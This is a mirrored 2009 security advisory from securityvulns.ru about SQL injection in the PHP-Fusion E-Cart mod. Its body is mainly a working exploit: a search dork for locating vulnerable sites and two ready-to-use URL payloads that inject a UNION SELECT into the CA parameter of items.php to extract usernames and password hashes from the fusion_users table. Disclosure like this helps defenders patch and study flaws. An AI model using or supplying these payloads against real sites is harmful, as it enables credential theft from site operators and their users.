Computer Security

Security Advisory: PHP-Fusion Mod E-Cart Sql Injection
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Plunet BusinessManager failure in access controls and multiple stored cross site scripting

  PHP-Fusion Mod vArcade 1.8 Sql Injection Vulnerability

  PHP-Fusion Mod Members Bewerb Sql Injection

  Cross-Site Scripting vulnerability in Xaraya

From:r3d.w0rm_(at)_yahoo.com <r3d.w0rm_(at)_yahoo.com>
Date:11.01.2009
Subject:PHP-Fusion Mod E-Cart Sql Injection

#################################################################################
####
####                    PHP-Fusion Mod E-Cart Sql Injection                      ####
#################################################################################
####
#                                                                                  
 #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
#Our Site : Http://IRCRASH.COM                                                      #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi
#################################################################################
####
#                                                                                  
 #
#Download : http://www.phpfusion-mods.net/infusions/downloads/dldb.php?op=view&id=281
#                                                                                  
 #
#Dork : inurl:/infusions/e_cart                                                     #
#                                                                                  
 #
#################################################################################
####
#                                      [Bug]                                        #
#                                                                                  
 #
#Username :
http://Site/[path]/infusions/e_cart/items.php?CA=-
9999'%20union%20select%20user_name,1,
2%20from%20fusion_users/*
#                                                                                  
 #
#Password :
http://Site/[path]/infusions/e_cart/items.php?CA=-
9999'%20union%20select%20user_password,1,
2%20from%20fusion_users/*
#                                                                                  
 #
#################################################################################
####
#                           Site : Http://IRCRASH.COM                               #
###################################### TNX GOD ######################################
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server